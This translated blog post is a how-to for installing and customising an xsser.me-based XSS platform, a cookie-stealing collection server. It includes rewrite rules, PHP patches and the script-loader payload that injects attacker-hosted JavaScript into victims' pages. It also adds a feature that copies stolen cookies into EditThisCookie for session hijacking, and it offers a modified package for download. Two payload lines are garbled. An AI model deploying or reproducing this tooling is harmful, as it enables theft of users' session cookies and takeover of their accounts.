XSS Platform Setup and Optimization (based on xsser.me source)

Source: Internet
Author: User
Tags: add time, auth, sublime text

This week I spent a little time on the company intranet forum and, unfortunately, found that the XSS platform that had been set up there was down, so I went looking for code to rebuild it.

On Zone I found a version that someone else had optimized; the author is gosuto (the download link was given in the original post).

Why this one? Mainly because the author restyled the default xsser.me theme with Bootstrap, so it looks a lot more polished (as for mobile compatibility and the like, forget it).

Download the source and modify it according to the author's installation instructions: edit the database connection fields in config.php (user name, password, database name), the site URL path, and the pseudo-static (URL rewrite) setting. Import xssplatform.sql from the root directory into the database. Then run the following SQL statement to replace the domain name stored in the database with your own (the replacement value must match the URL path you configured in config.php):

UPDATE oc_module SET code = replace(code, 'http://xsser.me', 'http://YOURDOMAIN/XSS');
Replace the domain name in authtest.php with your own as well. After your first registration succeeds, set adminLevel to 1 for that account in the user table; this makes you the super administrator, who can issue and manage invitation codes. Finally, configure the pseudo-static rewrite rules according to your web server:

Apache

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^([0-9a-zA-Z]{6})$ /index.php?do=code&urlkey=$1 [L]
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ /index.php?do=do&auth=$1&domain=$3 [L]
RewriteRule ^register/(.*?)$ /index.php?do=register&key=$1 [L]
RewriteRule ^register-validate/(.*?)$ /index.php?do=register&act=validate&key=$1 [L]
</IfModule>

Nginx

rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlkey=$1 break;
rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 break;
rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 break;
rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 break;
rewrite "^/login$" /index.php?do=login break;

That completes the setup of the XSS platform.

I ran into a few bugs while using it, so I made some changes to the source code.

1. The short-URL interface is partly broken

The project code includes a function for converting the payload URL to a short URL. The original xsser.me does not have this; it was integrated by another author.

The code offers short-URL conversion through t.cn and is.gd, with the corresponding functions at roughly lines 350 and 357 of source/function.php. Since the is.gd API address had expired, I decided to remove that part.

First remove what is shown on the page. Open templates_c/%%4d^4d3^4d30cf2a%%project_viewcode.html.php (this is the compiled Smarty template; if the source template under themes/default is edited later or templates_c is cleared, Smarty regenerates this file, so make the same change in the source template as well) and remove the following code:

<p>
    <pre>
        <?php echo $this->_tpl_vars['shortShow1']; ?>
    </pre>
</p>

Then comment out the following two lines in source/project.php:

$shortUrl2 = longUrlToShortUrl2($longUrl); // short URL 2
$shortShow2 = stripstr("<script src=" . $shortUrl2 . "></script>");
2. Remove the timestamp from the JS URL

The timestamp appended to the JS URL is there so that, after the JS code is modified, browsers that have cached the old script fetch the new one. In actual testing I felt it made little difference; refreshing the page generally brings in the new code anyway. So I removed the timestamp from the JS URL.

Make the following modifications in source/project.php (in each pair, the first line is the original and the second is the replacement):

$codeurl = URL_ROOT . "/{$project['urlKey']}?" . time();
$codeurl = URL_ROOT . "/{$project['urlKey']}";

$scriptShow1 = stripstr("<script src=" . URL_ROOT . "/{$project['urlKey']}?" . time() . "></script>");
$scriptShow1 = stripstr("<script src=" . URL_ROOT . "/{$project['urlKey']}></script>");

$code2 = 'var b=document.createElement("script");b.src="' . URL_ROOT . "/{$project['urlKey']}?" . '"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';
$code2 = 'var b=document.createElement("script");b.src="' . URL_ROOT . "/{$project['urlKey']}" . '";(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);';

$scriptShow2 = stripstr("...");
$scriptShow2 = stripstr("...");
(the string arguments of these two $scriptShow2 lines are garbled on the page and are not reproduced here)
3. HTML optimization

Some of the JavaScript and CSS resources are loaded from a foreign CDN, and sometimes the page takes a very long time to appear, so I changed those references to local copies (self-hosting also means the platform's own admin pages no longer pull executable script from a third party). Switching to a domestic CDN address would work too.

Search the whole directory in Sublime Text for the places where jquery-1.9.1.min.js and bootstrap.min.js are referenced and change them to local references, placing the files in the corresponding folder under themes/default.

<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
// modified to:
<script src="<?php echo $this->_tpl_vars['url']['themePath']; ?>/js/jquery.min.js"></script>

<script src="http://www.bootstrapcdn.com/bootstrap/2.3.1/js/bootstrap.min.js"></script>
// modified to:
<script src="<?php echo $this->_tpl_vars['url']['themePath']; ?>/js/bootstrap.min.js"></script>

PS. Note that the modified code is two lines.

PPS. JavaScript files are ideally placed at the end of <body>, but that would mean finding every JavaScript reference by hand, which is too much trouble.

4. Add a cookie copy function

When you capture someone's cookie, you normally use the EditThisCookie extension to import it into Chrome. However, the cookie string produced by document.cookie cannot be imported directly; it has to be converted into the JSON format that EditThisCookie expects.

The source already ships JS code implementing the copy function, but it is commented out by default because the implementation is incomplete. Also, the copy function just prints the JSON cookie to the screen with alert(), and the alert box does not show all the content when the cookie is large.

So I decided to change this feature so that the JSON content is put on the clipboard, with the JSON complete.

First modify the HTML nodes: open %%33^334^334db811%%project_view.html.php and find the following:

<li>
<?php echo $this->_tpl_vars['ck']; ?>
 : <?php echo $this->_tpl_vars['c']; ?>
</li>

Modified as:

<li>
<?php echo $this->_tpl_vars['ck']; ?>
 : <span id="<?php echo $this->_tpl_vars['ck']; ?>"><?php echo $this->_tpl_vars['c']; ?></span>
</li>

Then find:

<tr class="ohidden">

modified to:

<tr id="<?php echo $this->_tpl_vars['v']['id']; ?>" class="ohidden">

And find the commented-out copy link:

<!--
            &nbsp;&nbsp;<a href="javascript:void(0)" onclick="copy(this)">Copy</a>
            -->

modified to:

&nbsp;&nbsp;<a href="javascript:void(0)" onclick="copy(this)">Copy</a>

When a record has no location or cookie value, the copy() function throws an error, so add a guard condition:

var table = $(obj).parent().parent();
var l = table.find("#location").text();
var c = table.find("#cookie").text();

Modified to:

var table = $("#" + obj).parent().parent();
var l = table.find("#location").text();
var c = table.find("#cookie").text();
if (l == "" || c == "") {
    return "";
}

Change how the copy() function returns its result:

alert(JSON.stringify(data));

Modified to:

return JSON.stringify(data);

To get the JSON data onto the clipboard we use the ZeroClipboard.js plugin. (Note that ZeroClipboard copies through a Flash SWF, see swfPath below; current browsers no longer run Flash, so on a modern browser the same copy would have to use navigator.clipboard.writeText instead.) Here is the calling code:

<script src="<?php echo $this->_tpl_vars['url']['themePath']; ?>/js/ZeroClipboard.min.js"></script>
<script>
// Point ZeroClipboard at the bundled SWF and bind it to every element with class "copybtn".
ZeroClipboard.config({ swfPath: "<?php echo $this->_tpl_vars['url']['themePath']; ?>/swf/ZeroClipboard.swf" });
var client = new ZeroClipboard($(".copybtn"));
client.on("copy", function (event) {
    // copy() (modified above) returns the JSON for the row whose copy button was clicked.
    var clipboard = event.clipboardData;
    clipboard.clearData();
    clipboard.setData("text/plain", copy(event.target.id));
});
client.on("aftercopy", function (event) {
    if (typeof (event.success["text/plain"]) == "undefined") {
        alert("Cookie copy failed, please check the cookie format ~");
    } else {
        alert("Cookie copied to the clipboard; you can import it into EditThisCookie ~");
    }
});
</script>

That's it.

There are also some small changes I won't go into; anyway, it works well now ~

Finally, here is my revised source package ~

Download address: xss_platform.tgz
